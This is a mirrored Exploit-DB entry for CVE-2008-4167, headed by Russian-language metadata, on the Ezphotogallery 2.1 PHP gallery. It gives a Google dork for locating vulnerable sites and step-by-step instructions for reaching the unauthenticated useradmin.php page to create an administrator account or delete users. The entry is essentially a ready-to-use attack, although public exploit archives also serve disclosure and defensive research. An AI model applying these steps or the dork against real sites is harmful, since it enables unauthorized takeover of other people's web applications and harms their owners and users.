- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6437
- Проверка EDB
-
- Пройдено
- Автор
- STACK
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-4167
- Дата публикации
- 2008-09-11
Код:
#----------------------------------------------------------------
#
#Script : Ezphotogallery 2.1
#
#Type : Vulnerabilities ( Add Admin user/Remove user)
#
#Google Dork : "100% | 50% | 25%" "Back to gallery" inurl:"show.php?imageid="
#
#----------------------------------------------------------------
#
#Discovered by : Stack
#
#----------------------------------------------------------------
#
#Script Download : http://heanet.dl.sourceforge.net/sourceforge/ezphotogallery/ezphotogallery-2.1.zip
#
#----------------------------------------------------------------
Exploit :
http://site.il/useradmin.php
how to use exploit
in Add user select
----------------------------------------
Simple example by Stack user :d :d
----------------------------------------
Add user
Name: Stack
Password: passstack
E-mail: [email protected]
Private: yes or no
Administrator: yes
now stack username is a administrator user
----------------------------------------
Remove user
User: chouse the user and click remove
----------------------------------------
# milw0rm.com [2008-09-11]
- Источник
- www.exploit-db.com